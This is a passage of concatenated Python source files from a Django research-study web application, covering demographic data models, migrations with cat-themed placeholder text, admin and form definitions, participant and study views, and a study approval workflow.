('<18', 'under 18'),\n ('18-21', '18-21'),\n ('22-24', '22-24'),\n ('25-29', '25-29'),\n ('30-34', '30-34'),\n ('35-39', '35-39'),\n ('40-44', '40-44'),\n ('45-59', '45-49'),\n ('50s', '50-59'),\n ('60s', '60-69'),\n ('>70', '70 or over')\n )\n\n GUARDIAN_CHOICES = (\n ('1', '1'),\n ('2', '2'),\n ('3>', '3 or more'),\n ('varies', 'varies')\n )\n INCOME_CHOICES = (\n ('0', '0'),\n ('5000', '5000'),\n ('10000', '10000'),\n ('15000', '15000'),\n ('20000', '20000'),\n ('30000', '30000'),\n ('40000', '40000'),\n ('50000', '50000'),\n ('60000', '60000'),\n ('70000', '70000'),\n ('80000', '80000'),\n ('90000', '90000'),\n ('100000', '100000'),\n ('110000', '110000'),\n ('120000', '120000'),\n ('130000', '130000'),\n ('140000', '140000'),\n ('150000', '150000'),\n ('160000', '160000'),\n ('170000', '170000'),\n ('180000', '180000'),\n ('190000', '190000'),\n ('>200000', 'over 200000'),\n ('na', 'prefer not to answer')\n )\n DENSITY_CHOICES = (\n ('urban', 'urban'),\n ('suburban', 'suburban'),\n ('rural', 'rural')\n )\n user = models.ForeignKey(User, on_delete=models.CASCADE,\n related_name='demographics', related_query_name='demographics')\n created_at = models.DateTimeField(auto_now_add=True)\n previous = models.ForeignKey('self', on_delete=models.CASCADE, related_name='next_demographic_data',\n related_query_name='next_demographic_data', null=True, blank=True)\n\n number_of_children = models.CharField(choices=NO_CHILDREN_CHOICES, max_length=3)\n child_birthdays = ArrayField(models.DateField(), verbose_name='children\\'s birthdays')\n languages_spoken_at_home = models.TextField(verbose_name='languages spoken at home')\n number_of_guardians = models.CharField(choices=GUARDIAN_CHOICES, max_length=6)\n number_of_guardians_explanation = models.TextField()\n race_identification = models.CharField(max_length=16, choices=RACE_CHOICES)\n age = models.CharField(max_length=5, choices=AGE_CHOICES)\n gender = models.CharField(max_length=2, choices=GENDER_CHOICES)\n education_level = models.CharField(max_length=5, choices=EDUCATION_CHOICES)\n spouse_education_level = models.CharField(max_length=5, choices=SPOUSE_EDUCATION_CHOICES)\n annual_income = models.CharField(max_length=7, choices=INCOME_CHOICES)\n number_of_books = models.IntegerField()\n additional_comments = models.TextField()\n country = CountryField()\n state = USStateField(choices=('XX', _('Select a State')) + USPS_CHOICES[:])\n density = models.CharField(max_length=8, choices=DENSITY_CHOICES)\n extra = DateTimeAwareJSONField(null=True)\n\n def __str__(self):\n return f'<DemographicData: {self.user.get_short_name()} @ {self.created_at:%c}>'\n\n def to_display(self):\n return dict(\n user=self.user.uuid.hex,\n created_at=self.created_at.isoformat(),\n number_of_children=self.get_number_of_children_display(),\n child_birthdays=[birthday.isoformat() for birthday in self.child_birthdays],\n languages_spoken_at_home=self.languages_spoken_at_home,\n number_of_guardians=self.get_number_of_guardians_display(),\n number_of_guardians_explanation=self.number_of_guardians_explanation,\n race_identification=self.get_race_identification_display(),\n age=self.get_age_display(),\n gender=self.get_gender_display(),\n education_level=self.get_education_level_display(),\n spouse_education_level=self.get_spouse_education_level_display(),\n annual_income=self.get_annual_income_display(),\n number_of_books=self.number_of_books,\n additional_comments=self.additional_comments,\n country=str(self.country),\n state=self.get_state_display(),\n density=self.get_density_display(),\n extra=self.extra\n )\n" }, { "alpha_fraction": 0.5643044710159302, "alphanum_fraction": 0.6062992215156555, "avg_line_length": 28.30769157409668, "blob_id": "ddf2c6f0db874f35fd9f4c0babc41f9055301f94", "content_id": "29bf1350c8c007003e1bc5232cfd7b995991eda5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "permissive", "max_line_length": 168, "num_lines": 26, "path": "/studies/migrations/0009_auto_20170505_1605.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 16:05\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0008_auto_20170505_1602'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='study',\n name='criteria',\n field=models.TextField(default='American bobtail savannah tiger norwegian forest manx maine coon but ragdoll. Mouser ragdoll. Turkish angora cornish rex.'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='study',\n name='image',\n field=models.ImageField(null=True, upload_to=''),\n ),\n ]\n" }, { "alpha_fraction": 0.5697808265686035, "alphanum_fraction": 0.5940023064613342, "avg_line_length": 36.69565200805664, "blob_id": "54c7f329f41209a457624b4f4b4e639420b7d2b6", "content_id": "11e860e7a8e8f2854342fe969b5b03684ac0d8ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "permissive", "max_line_length": 250, "num_lines": 23, "path": "/accounts/migrations/0008_auto_20170516_1549.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-16 15:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0007_add_cos_admin_group_and_assign_perms'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('can_view', 'Can View'), ('can_edit', 'Can Edit'), ('can_create', 'Can Create'), ('can_remove', 'Can Remove'))},\n ),\n migrations.AlterModelOptions(\n name='user',\n options={'permissions': (('can_create', 'Can Create'), ('can_view', 'Can View'), ('can_edit', 'Can Edit'), ('can_remove', 'Can Remove'), ('can_view_permissions', 'Can View Permissions'), ('can_edit_permissions', 'Can Edit Permissions'))},\n ),\n ]\n" }, { "alpha_fraction": 0.8283898234367371, "alphanum_fraction": 0.8283898234367371, "avg_line_length": 21.4761905670166, "blob_id": "7eba287197c6b3eabdf2a05ea5dd64f5c6ac579a", "content_id": "e3dc85a9d1781219276b147b3c39a6c4fc5c6f6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 472, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/accounts/admin.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom accounts.models import DemographicData, Organization\nfrom guardian.admin import GuardedModelAdmin\n\nfrom .models import User\n\n\nclass UserAdmin(GuardedModelAdmin):\n pass\n\nclass OrganizationAdmin(GuardedModelAdmin):\n pass\n\nclass DemographicDataAdmin(GuardedModelAdmin):\n pass\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Organization, OrganizationAdmin)\nadmin.site.register(DemographicData, DemographicDataAdmin)\n" }, { "alpha_fraction": 0.6520993709564209, "alphanum_fraction": 0.6700942516326904, "avg_line_length": 30.54054069519043, "blob_id": "a91006f9552191e6474aab46c92eb16b4db28109", "content_id": "08117108b06a3371e271725b42d9db5d9ca30461", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1167, "license_type": "permissive", "max_line_length": 98, "num_lines": 37, "path": "/web/migrations/0001_create_initial_flatpages.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-15 20:28\nfrom __future__ import unicode_literals\n\nfrom django.contrib.flatpages.models import FlatPage\nfrom django.contrib.sites.models import Site\nfrom django.db import migrations\n\nflatpages = [\n dict(url='/', title='Home', content='Home'),\n dict(url='/faq', title='FAQ', content='FAQ'),\n dict(url='/scientists', title='The Scientists', content='The Scientists'),\n dict(url='/resources', title='Resources', content='Resources'),\n dict(url='/contact', title='Contact Us', content='Contact Us'),\n]\n\n\ndef make_pages(*args, **kwargs):\n site, created = Site.objects.get_or_create(domain='example.com', defaults={'name': 'Example'})\n for page in flatpages:\n flatpage_obj, created = FlatPage.objects.get_or_create(**page)\n flatpage_obj.sites.add(site)\n\n\ndef unmake_pages(*args, **kwargs):\n FlatPage.objects.filter(url__in=[page['url'] for page in flatpages]).delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0014_study_uuid'),\n ]\n\n operations = [\n migrations.RunPython(make_pages, reverse_code=unmake_pages)\n ]\n" }, { "alpha_fraction": 0.5843949317932129, "alphanum_fraction": 0.6353503465652466, "avg_line_length": 32.05263137817383, "blob_id": "95a7460aeceaed95a48bb686686c2e3e100d98cd", "content_id": "2c3589d052589d57add0318e111177234c4e8504", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "permissive", "max_line_length": 256, "num_lines": 19, "path": "/accounts/migrations/0005_auto_20170428_1814.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-28 18:14\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0004_auto_20170427_1938'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('is_admin', 'Organization Administrator'), ('can_add_collaborators', 'Can Add Collaborators'), ('can_approve_studies', 'Can Approve Studies'), ('can_disable_studies', 'Can Disable Studies'), ('can_view', 'Can View'))},\n ),\n ]\n" }, { "alpha_fraction": 0.5805795788764954, "alphanum_fraction": 0.5879511833190918, "avg_line_length": 50.09090805053711, "blob_id": "bcfb732d019ccefc9e66e5fc887a660341ddd1c5", "content_id": "768d745f2475d4868760c158379c23089ba81722", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "permissive", "max_line_length": 350, "num_lines": 77, "path": "/studies/migrations/0001_initial.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-24 17:31\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport project.fields.datetime_aware_jsonfield\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accounts', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('results', project.fields.datetime_aware_jsonfield.DateTimeAwareJSONField(default=dict)),\n ('demographic_snapshot', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.DemographicData')),\n ('participant', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'permissions': (('view_response', 'View Response'),),\n },\n ),\n migrations.CreateModel(\n name='ResponseLog',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('action', models.CharField(choices=[('started', 'Started'), ('paused', 'Paused'), ('abandoned', 'Abandoned'), ('finished', 'Finished')], max_length=128)),\n ('response', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Response')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Study',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('is_active', models.BooleanField(default=True)),\n ('blocks', project.fields.datetime_aware_jsonfield.DateTimeAwareJSONField(default=dict)),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='studies', related_query_name='study', to='accounts.Organization')),\n ],\n options={\n 'permissions': (('view_study', 'View Study'), ('edit_study', 'Edit Study'), ('can_respond', 'Can Respond?')),\n },\n ),\n migrations.CreateModel(\n name='StudyLog',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('action', models.CharField(choices=[('created', 'Created'), ('submitted', 'Submitted for Approval'), ('rejected', 'Rejected'), ('approved', 'Approved'), ('started', 'Started'), ('paused', 'Paused'), ('resumed', 'Resumed'), ('deactivated', 'Deactivated'), ('retracted', 'Retracted'), ('viewed_data', 'Viewed Data')], max_length=128)),\n ('study', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Study')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='response',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.5793742537498474, "alphanum_fraction": 0.6176129579544067, "avg_line_length": 33.52000045776367, "blob_id": "5cfe052a3e7ac1b3d01c067b1cf5f5eef456a670", "content_id": "29f5029f47b547014bc2fc947393d8104bbc07b5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "permissive", "max_line_length": 292, "num_lines": 25, "path": "/accounts/migrations/0006_auto_20170505_0004.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 00:04\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0005_auto_20170428_1814'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('is_admin', 'Organization Administrator'), ('can_add_collaborators', 'Can Add Collaborators'), ('can_approve_studies', 'Can Approve Studies'), ('can_disable_studies', 'Can Disable Studies'), ('can_view', 'Can View'), ('can_add_study', 'Can Add Study'))},\n ),\n migrations.AddField(\n model_name='user',\n name='uuid',\n field=models.UUIDField(default=uuid.uuid4, verbose_name='identifier'),\n ),\n ]\n" }, { "alpha_fraction": 0.6109133958816528, "alphanum_fraction": 0.6251482963562012, "avg_line_length": 29.10714340209961, "blob_id": "3e6af4d3666e17cd22f6029818c105cdf7072372", "content_id": "f50163d69436f946a1e29d82057d901c1e938d7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "permissive", "max_line_length": 168, "num_lines": 28, "path": "/studies/forms.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from ace_overlay.widgets import AceOverlayWidget\nfrom django import forms\n\nfrom studies.models import Response, Study\n\n\nclass ResponseForm(forms.ModelForm):\n results = forms.CharField(widget=AceOverlayWidget(mode='json', wordwrap=True, theme='textmate', width=\"100%\", height=\"100%\", showprintmargin=False), required=False)\n class Meta:\n fields = (\n 'study',\n 'participant',\n 'demographic_snapshot',\n 'results'\n )\n model = Response\n\n\nclass StudyForm(forms.ModelForm):\n blocks = forms.CharField(widget=AceOverlayWidget(mode='json', wordwrap=True, theme='textmate', width=\"100%\", height=\"100%\", showprintmargin=False), required=False)\n\n class Meta:\n fields = (\n 'name',\n 'organization',\n 'blocks'\n )\n model = Study\n" }, { "alpha_fraction": 0.6978743076324463, "alphanum_fraction": 0.6984995603561401, "avg_line_length": 37.54216766357422, "blob_id": "0d63d6257652b3fcc2bd6de6895460cac53fd18c", "content_id": "49185962d83dd6487345ab5b7533ea40e5969e37", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6398, "license_type": "permissive", "max_line_length": 157, "num_lines": 166, "path": "/exp/views/user.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.shortcuts import reverse\nfrom django.views import generic\n\nfrom accounts.forms import UserStudiesForm\nfrom accounts.models import User\nfrom guardian.mixins import LoginRequiredMixin\nfrom guardian.shortcuts import get_objects_for_user\nfrom studies.models import Study, Response\n\n\nclass ParticipantListView(LoginRequiredMixin, generic.ListView):\n '''\n ParticipantListView shows a list of participants that have participated in studies\n related to organizations that the current user has permissions to.\n '''\n template_name = 'accounts/participant_list.html'\n queryset = User.objects.exclude(demographics__isnull=True)\n model = User\n\n def get_queryset(self):\n qs = super(ParticipantListView, self).get_queryset()\n return qs.filter(response__study__organization=self.request.user.organization)\n\n\nclass ParticipantDetailView(LoginRequiredMixin, generic.UpdateView):\n '''\n ParticipantDetailView shows information about a participant that has participated in studies\n related to organizations that the current user has permission to.\n '''\n queryset = User.objects.exclude(demographics__isnull=True).select_related('organization')\n fields = ('is_active', )\n template_name = 'accounts/participant_detail.html'\n model = User\n\n def get_queryset(self):\n qs = super(ParticipantDetailView, self).get_queryset()\n return qs.filter(response__study__organization=self.request.user.organization)\n\n def get_success_url(self):\n return reverse('exp:participant-detail', kwargs={'pk': self.object.id})\n\n\nclass ResponseListView(LoginRequiredMixin, generic.ListView):\n '''\n Displays a list of responses for studies that the current user can view.\n '''\n template_name = 'accounts/response_list.html'\n\n def get_queryset(self):\n studies = get_objects_for_user(self.request.user, 'studies.can_view')\n return Response.objects.filter(study__in=studies).order_by('study__name')\n\n\nclass ResponseDetailView(LoginRequiredMixin, generic.DetailView):\n '''\n Displays a response.\n '''\n template_name = 'accounts/response_detail.html'\n\n def get_queryset(self):\n studies = get_objects_for_user(self.request.user, 'studies.can_view')\n return Response.objects.filter(study__in=studies).order_by('study__name')\n\n\nclass CollaboratorListView(LoginRequiredMixin, generic.ListView):\n '''\n Displays a list of collaborators in the same organization as the current user. \n '''\n template_name = 'accounts/collaborator_list.html'\n queryset = User.objects.filter(demographics__isnull=True)\n model = User\n\n def get_queryset(self):\n qs = super(CollaboratorListView, self).get_queryset()\n # TODO this should probably use permissions eventually, just to be safe\n return qs.filter(organization=self.request.user.organization)\n\n\nclass CollaboratorDetailView(LoginRequiredMixin, generic.UpdateView):\n '''\n CollaboratorDetailView shows information about a collaborator and allows enabling or disabling\n a user.\n '''\n queryset = User.objects.filter(demographics__isnull=True)\n fields = ('is_active', )\n template_name = 'accounts/collaborator_detail.html'\n model = User\n\n def get_success_url(self):\n return reverse('exp:collaborator-detail', kwargs={'pk': self.object.id})\n\n def post(self, request, *args, **kwargs):\n retval = super(CollaboratorDetailView, self).post(request, *args, **kwargs)\n if 'enable' in self.request.POST:\n self.object.is_active = True\n elif 'disable' in self.request.POST:\n self.object.is_active = False\n self.object.save()\n return retval\n\n\nclass AssignCollaboratorStudies(LoginRequiredMixin, generic.UpdateView):\n '''\n AssignUserStudies lists studies available and let's someone assign permissions\n to users.\n '''\n template_name = 'accounts/assign_studies_form.html'\n queryset = User.objects.filter(demographics__isnull=True)\n form_class = UserStudiesForm\n\n def get_success_url(self):\n return reverse('exp:collaborator-list')\n\n def get_initial(self):\n permissions = ['studies.view_study', 'studies.edit_study']\n initial = super(AssignCollaboratorStudies, self).get_initial()\n initial['studies'] = get_objects_for_user(self.object, permissions)\n return initial\n\n def get_context_data(self, **kwargs):\n context = super(AssignCollaboratorStudies, self).get_context_data(**kwargs)\n # only show studies in their organization\n context['studies'] = Study.objects.filter(organization=context['user'].organization)\n return context\n\n\nclass CollaboratorCreateView(LoginRequiredMixin, generic.CreateView):\n '''\n UserCreateView creates a user. It forces is_active to True; is_superuser\n and is_staff to False; and sets a random 12 char password.\n\n TODO Eventually this should email the user at their username/email once they\n are saved.\n TODO It should set an unusable password, send them an email to a url with that password\n in it as a token, let them set their own password after clicking the link. It should\n definitely check to make sure it's an unusable password before it allows the reset.\n '''\n model = User\n template_name = 'accounts/collaborator_form.html'\n fields = (\n 'username',\n 'given_name',\n 'middle_name',\n 'family_name',\n 'is_active',\n 'is_staff',\n 'is_superuser',\n 'password'\n )\n\n def post(self, request, *args, **kwargs):\n # TODO put this on the view so that we can send the user an email once their user is saved\n # TODO alternatively send the password in a post_save signal under certain conditions\n self.user_password = User.objects.make_random_password(length=12)\n form = self.get_form()\n query_dict = form.data.copy()\n # implicitly add them to their creator's organization\n query_dict.update(is_active=True, is_superuser=False, is_staff=False, password=self.user_password, organization=self.request.user.organization)\n form.data = query_dict\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n def get_success_url(self):\n return reverse('exp:assign-studies', kwargs={'pk': self.object.id})\n" }, { "alpha_fraction": 0.6811245083808899, "alphanum_fraction": 0.6811245083808899, "avg_line_length": 32.64864730834961, "blob_id": "d216ef4bb04f49d8d8d550a36a86763a5bd54539", "content_id": "e99303ec70def8c5c89a302926df2b033980c364", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2490, "license_type": "permissive", "max_line_length": 128, "num_lines": 74, "path": "/exp/views/study.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import reverse\nfrom django.views import generic\n\nfrom guardian.mixins import LoginRequiredMixin\nfrom guardian.shortcuts import get_objects_for_user, get_perms\n\nfrom studies.forms import StudyForm\nfrom studies.models import Study\n\n\nclass StudyCreateView(LoginRequiredMixin, generic.CreateView):\n '''\n StudyCreateView allows a user to create a study and then redirects\n them to the detail view for that study.\n '''\n fields = ('name', 'organization', 'blocks', )\n model = Study\n\n def get_form_class(self):\n return StudyForm\n\n def get_success_url(self):\n return reverse('exp:study-detail', kwargs=dict(pk=self.object.id))\n\n\nclass StudyListView(LoginRequiredMixin, generic.ListView):\n '''\n StudyListView shows a list of studies that a user has permission to.\n '''\n model = Study\n\n def get_queryset(self, *args, **kwargs):\n return get_objects_for_user(self.request.user, 'studies.can_view')\n\n\n\nclass StudyDetailView(LoginRequiredMixin, generic.DetailView):\n '''\n StudyDetailView shows information about a study.\n '''\n template_name = 'studies/study_detail.html'\n model = Study\n\n def get_permitted_triggers(self, triggers):\n permitted_triggers = []\n organization_permissions = get_perms(self.request.user, self.object.organization)\n\n admin_triggers = ['reject', 'approve']\n\n for trigger in triggers:\n # remove autogenerated triggers\n if trigger.startswith('to_'):\n continue\n # remove triggers that people don't have permission to\n if not self.request.user.is_superuser or (trigger in admin_triggers and 'is_admin' not in organization_permissions):\n continue\n\n permitted_triggers.append(trigger)\n\n return permitted_triggers\n\n def post(self, *args, **kwargs):\n trigger = self.request.POST['trigger']\n object = self.get_object()\n if hasattr(object, trigger):\n # transition through workflow state\n getattr(object, trigger)(user=self.request.user)\n return HttpResponseRedirect(reverse('exp:study-detail', kwargs=dict(pk=object.pk)))\n\n def get_context_data(self, **kwargs):\n context = super(StudyDetailView, self).get_context_data(**kwargs)\n context['triggers'] = self.get_permitted_triggers(self.object.machine.get_triggers(self.object.state))\n return context\n" }, { "alpha_fraction": 0.6963383555412292, "alphanum_fraction": 0.7095959782600403, "avg_line_length": 59.92307662963867, "blob_id": "4d350335f3a8aa3c7600634179649ddbd63bea4a", "content_id": "305e9903de37835f102328f0bd13758a6070bbfa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "permissive", "max_line_length": 990, "num_lines": 26, "path": "/studies/migrations/0008_auto_20170505_1602.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 16:02\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0007_study_description'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='study',\n old_name='description',\n new_name='short_description',\n ),\n migrations.AddField(\n model_name='study',\n name='long_description',\n field=models.TextField(default=\"Hide head under blanket so no one can see plan steps for world domination for catch mouse and gave it as a present with tail in the air. Hunt by meowing loudly at 5am next to human slave food dispenser the dog smells bad, so favor packaging over toy. Pose purrfectly to show my beauty go into a room to decide you didn't want to be in there anyway russian blue so stretch hide at bottom of staircase to trip human asdflkjaertvlkjasntvkjn (sits on keyboard) shake treat bag. Kitty ipsum dolor sit amet, shed everywhere shed everywhere stretching attack your ankles chase the red dot, hairball run catnip eat the grass sniff chase after silly colored fish toys around the house immediately regret falling into bathtub or my left donut is missing, as is my right claws in your leg or why must they do that, chase red laser dot. Stand in front of the computer screen destroy couch as revenge so refuse to drink water except out of someone's glass.\"),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5846154093742371, "alphanum_fraction": 0.6393162608146667, "avg_line_length": 26.85714340209961, "blob_id": "e47f8f488b2fdb41f476cc2e1d7e128201141e04", "content_id": "4d901d1b8828749afef0c9f5240c74738fc89678", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "permissive", "max_line_length": 152, "num_lines": 21, "path": "/studies/migrations/0005_auto_20170426_1741.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-26 17:41\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0004_auto_20170425_1950'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='studylog',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='logs', related_query_name='logs', to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.6849785447120667, "alphanum_fraction": 0.7124463319778442, "avg_line_length": 54.47618865966797, "blob_id": "77c15a8f540f28c44b2f9abe1d4940071b31b8f9", "content_id": "00e29a8f76c0d0ae214abfc9b97cf02c9039123f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "permissive", "max_line_length": 728, "num_lines": 21, "path": "/studies/migrations/0007_study_description.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 15:53\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0006_auto_20170426_1949'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='study',\n name='description',\n field=models.TextField(default=\"Pooping rainbow while flying in a toasted bread costume in space licks your face catch mouse and gave it as a present or chase the pig around the house or hide when guests come over toy mouse squeak roll over. Run outside as soon as door open refuse to drink water except out of someone's glass. Destroy the blinds destroy the blinds yet going to catch the red dot today going to catch the red dot today. Tuxedo cats always looking dapper roll over and sun my belly paw at your fat belly, destroy the blinds stare at the wall, play with food and get confused by dust yet leave fur on owners clothes. Chase the pig around the house. Purr intrigued by the shower intently sniff hand.\"),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.555343508720398, "alphanum_fraction": 0.5954198241233826, "avg_line_length": 26.578947067260742, "blob_id": "90ea57e2fe88be42f1ded7300b5ef7ce818bd388", "content_id": "07dfb83e0e597c3b034ec1cacc26c9ea5c8b592e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "permissive", "max_line_length": 158, "num_lines": 19, "path": "/studies/migrations/0012_auto_20170509_1535.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-09 15:35\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0011_study_contact_info'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='study',\n options={'permissions': (('can_view', 'View Study'), ('can_edit', 'Edit Study'), ('can_submit', 'Submit Study'), ('can_respond', 'Can Respond'))},\n ),\n ]\n" }, { "alpha_fraction": 0.498036652803421, "alphanum_fraction": 0.498036652803421, "avg_line_length": 22.492307662963867, "blob_id": "6009b02b948f77b3a1e9f976dfc440f4bb40ae54", "content_id": "2463e3837e6c49fd8fc8b4afb55e50b511bf7514", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1528, "license_type": "permissive", "max_line_length": 79, "num_lines": 65, "path": "/studies/workflow.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "\nstates = [\n 'created',\n 'submitted',\n 'rejected',\n 'retracted',\n 'approved',\n 'active',\n 'paused',\n 'deactivated'\n]\n\nSTATE_CHOICES = tuple(\n (x, x.title()) for x in states\n)\n\ntransitions = [\n {\n 'trigger': 'submit',\n 'source': 'created',\n 'dest': 'submitted',\n 'after': 'notify_administrators_of_submission',\n },\n {\n 'trigger': 'approve',\n 'source': 'submitted',\n 'dest': 'approved',\n 'after': 'notify_submitter_of_approval',\n },\n {\n 'trigger': 'reject',\n 'source': ['submitted', 'approved', 'active', 'paused', 'deactivated'],\n 'dest': 'rejected',\n 'after': 'notify_submitter_of_rejection',\n },\n {\n 'trigger': 'retract',\n 'source': 'submitted',\n 'dest': 'retracted',\n 'after': 'notify_administrators_of_retraction',\n },\n {\n 'trigger': 'resubmit',\n 'source': 'rejected',\n 'dest': 'submitted',\n 'after': 'notify_administrators_of_submission'\n },\n {\n 'trigger': 'activate',\n 'source': ['approved','paused'],\n 'dest': 'active',\n 'after': 'notify_administrators_of_activation'\n },\n {\n 'trigger': 'pause',\n 'source': 'active',\n 'dest': 'paused',\n 'after': 'notify_administrators_of_pause',\n },\n {\n 'trigger': 'deactivate',\n 'source': ['active', 'paused'],\n 'dest': 